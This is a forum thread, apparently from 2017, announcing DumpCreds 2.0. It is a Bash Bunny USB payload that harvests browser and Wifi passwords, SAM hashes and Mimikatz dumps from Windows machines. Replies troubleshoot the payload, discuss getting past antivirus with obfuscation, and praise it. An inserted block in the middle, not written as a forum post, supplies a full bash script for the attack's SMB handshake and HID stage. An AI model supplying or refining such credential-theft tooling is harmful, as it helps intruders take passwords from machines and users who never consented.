qdba Posted March 30, 2017 (edited April 5, 2017 by qdba)

DumpCreds 2.0

Author: QDBA
Version: 2.0.2
Target: Windows

Description

Dumps the usernames & plaintext passwords from
- Browsers (Chrome, IE, Firefox)
- Wifi
- SAM hashes
- Mimikatz dump
- [new] Computer information (hardware, software list, hotfixes, product key, users...)

without use of
- USB storage (because USB storage is mostly blocked by USBGuard or DriveLock)
- Internet connection (because firewall content filters block the download sites)

Configuration

None needed.

Requirements

Impacket must be installed. Install it from the tools_installer payload:
https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer

STATUS LED

LED                   Status
White                 Give drivers some time for installation
Red blink fast        Impacket not found
Red blink slow        Target did not acquire IP address
Amber blink fast      Initialization
Amber                 HID stage
Purple blink fast     Wait for IP coming up
Purple blink slow     Wait for handshake (SMB server coming up)
Purple / Amber        PowerShell scripts running
Red                   Error in PowerShell scripts
Green                 Finished

Download

https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0

ToDo

- Parallelize creds gathering with PS: while the Bash Bunny is waiting for the target to finish the script, it can do some other nice work, i.e. nmap the target. (Not very useful at the moment, because I'm admin on the target host.)
- Remove the modifications of the PowerSploit scripts, so you can download and use the original files. (At the moment you must use my scripts.) Not possible at the moment.
- Put some version information into the source code and the output file.
- Rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox). Maybe!
- If the target is in an AD domain and Mimikatz gives us some passwords, try to get some more information about the AD domain.

Credits to......
- https://github.com/sekirkity/BrowserGather: Get-ChromeCreds.ps1
- https://github.com/EmpireProject/Empire: Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1
LowValueTarget Posted March 30, 2017

How does this work when faced with anti-virus? What about encoding/obfuscating the PowerShell with unicorn?
https://github.com/trustedsec/unicorn
qdba Posted March 30, 2017 (Author)

@LowValueTarget At the moment MS Defender and Avira Antivir don't detect it. But I'm sure in 1 or 2 days they will :-

Feel free to obfuscate the code if you want. I won't publish encoded or obfuscated code here in this forum. If I do so, I'm sure some anti-virus tools will detect it in 1 or 2 days.
LowValueTarget Posted March 30, 2017 (edited March 30, 2017 by LowValueTarget)

7 minutes ago, qdba said:
> @LowValueTarget At the moment MS Defender and Avira Antivir don't detect it. But I'm sure in 1 or 2 days they will :- Feel free to obfuscate the code if you want. I won't publish encoded or obfuscated code here in this forum. If I do so, I'm sure some anti-virus tools will detect it in 1 or 2 days.

Fair enough. Good payload.
Mr.Pupp3T Posted March 30, 2017

So it's blinking red really fast on my secondary laptop (Windows 7). What does that mean, really?

> Red blink fast: Impacket not found

Like, what does "Impacket not found" mean?
illwill Posted March 31, 2017 (edited October 8, 2017 by illwill)

[Post removed: Violation of CoC]
Mr.Pupp3T Posted March 31, 2017

nvm, I got it! :D Wrong switch, haha.
illwill Posted March 31, 2017 (edited October 8, 2017 by illwill)

[Post removed: Violation of CoC]

illwill Posted March 31, 2017 (edited October 8, 2017 by illwill)

[Post removed: Violation of CoC]
jafahulo Posted March 31, 2017

I haven't taken a dive into the code yet, but while testing this on Windows 10 my Bunny is getting caught up waiting for the handshake (slow purple flashes). Do you know why this could be? I uninstalled the drivers that had been on my computer for the NDIS network adapter mode so it could have a fresh start, as though I was plugging it into a new machine, but still no cigar. Any suggestions?
qdba Posted March 31, 2017 (Author)

1 hour ago, jafahulo said:
> I haven't taken a dive into the code yet, but while testing this on Windows 10 my Bunny is getting caught up waiting for the handshake (slow purple flashes). [...]

While purple is blinking slowly, could you reach \\172.16.64.1\e with Windows Explorer?
jafahulo Posted March 31, 2017

4 minutes ago, qdba said:
> While purple is blinking slowly, could you reach \\172.16.64.1\e with Windows Explorer?

I just tested, and no, I wasn't able to.
qdba Posted March 31, 2017 (Author)

33 minutes ago, jafahulo said:
> I just tested, and no, I wasn't able to.

Could you check that File and Printer Sharing is enabled in your firewall?
qdba Posted March 31, 2017 (Author)

My ideas coming with the next version.....

- Parallelize creds gathering with PS: while the Bash Bunny is waiting for the target to finish the scripts, it can do some other nice work, i.e. nmap the target. (Any other ideas?)
- Remove the modifications of the PowerSploit scripts, so you can download and use the original files. (At the moment you must use my scripts.)
- Put some version information into the source code and the output file.
- Rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox). Maybe!
- If the target is in an AD domain and Mimikatz gives us some domain passwords, try to get some more information about the AD domain.
jafahulo Posted March 31, 2017

6 hours ago, qdba said:
> Could you check that File and Printer Sharing is enabled in your firewall?

Yes, File and Printer Sharing is enabled. I dug into it, and the Bash Bunny is actively refusing the connections. I connect my Bunny to the computer, it does GUI r into Run and runs the PowerShell script, which in turn runs the command line which waits until the Bunny's IP is on the network. Once it is, the Bash Bunny flashes purple slowly, the command window goes away, and nothing happens. It literally can't put the file on the Bunny to tell it to continue working. I'm thinking this is because my Bunny is configured incorrectly outside of your code. Could this be the case? I haven't ssh'd or serial'd into it and changed anything yet. Is that a prerequisite that was assumed to be done?
qdba Posted March 31, 2017 (Author)

32 minutes ago, jafahulo said:
> Yes, File and Printer Sharing is enabled. I dug into it, and the Bash Bunny is actively refusing the connections. [...]

- Can you ping 172.16.64.1?
- Try the attached payload.txt. If it goes to red, smbserver.py is missing. If not, ssh to the Bunny while the purple LED blinks slowly.

1. Enter this command at the terminal:

    ps -ef | grep smb

   As a result there should be a line like

    root 741 1 3 01:00 ? 00:00:27 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch1

2. Enter this command at the terminal:

    mount | grep udisk

   As a result there should be a line like

    /dev/nandf on /root/udisk type vfat (rw,relatime,fmask=0022,dmask=0022,codepage=cp437,iocharset=ascii,shortname=mixed,errors=continue)

Will the second PowerShell command fire up successfully? Check the cmd window (I switched it to B&W in the payload).

Have you tried it on a second computer?

[Attachment: payload.txt]
Blix Posted March 31, 2017

Fellas, for those of you who pass all the tests above and have the SMB server running, check that you have actually downloaded all the PowerShell scripts that the payload refers to from bashbunny-payloads/payloads/DumpCreds_2.0/PS/. I know some people who forgot to do that......

/Blix
jafahulo Posted March 31, 2017

3 hours ago, qdba said:
> Can you ping 172.16.64.1? Try the attached payload.txt. If it goes to red, smbserver.py is missing. If not, ssh to the Bunny while the purple LED blinks slowly. [...]

Alright, so I actually fixed it, but I'll let you know what was happening up to the point where I fixed it so you can reference it if you ever need to. I could ping it, and the light did not turn red. I ssh'd into it and ran:

    ps -ef | grep smb

I didn't get any smb servers running. The partition did mount to udisk correctly, and at that point the command was not opening the second PowerShell terminal correctly. (I further modified the payload you sent me to make the cmd window stay open after it ran.) What I did to fix it was to play around with how the smbserver got called. What worked for me was to have it called like this:

    python /pentest/impacket/examples/smbserver.py e $SWITCHDIR &

Small change, but huge difference. XD Thanks for all the help, and your payload is awesome! I love it!
qdba Posted April 1, 2017 (Author)

15 hours ago, jafahulo said:
> python /pentest/impacket/examples/smbserver.py e $SWITCHDIR &

Yes, that's the original call of the smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case. There are some timing problems in an older payload. I fixed them in a later version. Guess you have an old one, sorry about it. But anyway, fine that you like the payload.
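The Bunny-side handshake that qdba and jafahulo are debugging above (check that smbserver.py exists, background it with the share name "e" on the switch directory, then wait for the target to drop a file into that share), written out as an added example. This is not the DumpCreds payload and not code posted by anyone in the thread. The smbserver.py path and the /root/udisk/payloads/switch1 directory are the ones shown in the thread's ps output; the flag file name, the timeouts, the LED colours per step, and the LED/ATTACKMODE stubs used when the script runs off the Bunny are all my assumptions:

```shell
#!/bin/bash
# Added example (not from the DumpCreds payload): the Bash Bunny side of the
# SMB handshake discussed in this thread, split into functions so the waiting
# and checking logic can be exercised on an ordinary Linux box.
#
# Assumptions (labelled, none confirmed by the thread):
#   - smbserver.py is at /pentest/impacket/examples/smbserver.py and is
#     shared as share "e" (the thread's ps output shows exactly this call).
#   - The target-side PowerShell signals completion by writing a flag file
#     into the share root via \\172.16.64.1\e\ (file name is hypothetical).
#   - LED and ATTACKMODE are Bunny built-ins; off the Bunny, LED is stubbed
#     and the payload flow is skipped entirely.

IMPACKET_SMBSERVER="${IMPACKET_SMBSERVER:-/pentest/impacket/examples/smbserver.py}"
SWITCH_DIR="${SWITCH_DIR:-/root/udisk/payloads/switch1}"   # path from the thread
HANDSHAKE_FILE="${HANDSHAKE_FILE:-dumpcreds.done}"         # hypothetical flag name

# Stand-in for the Bunny LED command when this runs on a normal Linux host.
if ! command -v LED >/dev/null 2>&1; then
    LED() { echo "LED $*"; }
fi

# The thread maps "red blink fast" to "Impacket not found": check the script
# file exists before doing anything with the HID or network.
impacket_present() {
    [ -f "$1" ]
}

# Scripted version of the manual check 'ps -ef | grep smb' from the thread:
# returns 0 when an smbserver.py process is running.
smbserver_running() {
    ps -ef | grep -v grep | grep -q 'smbserver\.py'
}

# Background the SMB server the way the thread settled on
# (python smbserver.py e $SWITCHDIR &) and remember its PID for cleanup.
start_smbserver() {
    python "$IMPACKET_SMBSERVER" e "$1" >/dev/null 2>&1 &
    SMB_PID=$!
}

# Poll for the flag file the target writes through the share. The timeout is
# what turns the thread's "stuck on slow purple forever" into a visible
# failure. Returns 0 when the file appears, 1 when the timeout expires.
wait_for_handshake() {
    local dir="$1" flag="$2" timeout="${3:-120}"
    local waited=0
    while [ ! -f "$dir/$flag" ]; do
        if [ "$waited" -ge "$timeout" ]; then
            return 1
        fi
        sleep 1
        waited=$((waited + 1))
    done
    return 0
}

# Full payload flow; LED colours follow the thread's status table.
main() {
    LED R FAST
    if ! impacket_present "$IMPACKET_SMBSERVER"; then
        exit 1                         # stays red fast: Impacket not found
    fi
    LED A FAST                         # initialization
    ATTACKMODE HID RNDIS_ETHERNET
    rm -f "$SWITCH_DIR/$HANDSHAKE_FILE"   # never trust a stale flag from a previous run
    start_smbserver "$SWITCH_DIR"
    LED A                              # HID stage: the keystrokes that launch
    # the PowerShell on the target would be sent here (QUACK ... lines).
    LED M SLOW                         # purple slow: waiting for the handshake
    if wait_for_handshake "$SWITCH_DIR" "$HANDSHAKE_FILE" 300; then
        LED G
    else
        LED R
    fi
    kill "$SMB_PID" 2>/dev/null
}

# Only run the payload flow where the Bunny built-ins actually exist.
if command -v ATTACKMODE >/dev/null 2>&1; then
    main
fi
```

Two things matter here. First, the server is backgrounded with a plain `&` and its PID kept, which is the form jafahulo found working; a foreground call would block the payload before the HID stage ever ran. Second, the wait has a timeout, so a server that never comes up ends in red instead of the indistinguishable slow-purple hang described above, and `ps -ef | grep smb` from qdba's checklist is the first thing to run when it does.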
qdba Posted April 1, 2017 (Author)

New version 2.0.1

Added: Gather computer information (hardware, software, hotfixes, OS information, OS product key, user list...)
https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0
Decoy Posted April 1, 2017

6 hours ago, qdba said:
> New version 2.0.1. Added: Gather computer information (hardware, software, hotfixes, OS information, OS product key, user list...)
> https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0

I think you might need to update the main GitHub link on your original post.
jafahulo Posted April 1, 2017

7 hours ago, qdba said:
> Yes, that's the original call of the smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case. There are some timing problems in an older payload. I fixed them in a later version. Guess you have an old one, sorry about it. But anyway, fine that you like the payload.

Ahh, in that case, my bad! But thank you for taking the time to help me out with it!
Bijleveldje Posted April 1, 2017

Damn, this is a nice payload. Can't wait for this:

On 31-3-2017 at 9:04 AM, qdba said:
> Rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox).

Good job, keep up the good work.
qdba Posted April 1, 2017 (Author)

3 hours ago, Decoy said:
> I think you might need to update the main GitHub link on your original post.

Thanks..... Done.....
Decoy Posted April 1, 2017

4 minutes ago, qdba said:
> Thanks..... Done.....

No worries. I wanted to make sure people could find it. That is an excellent payload.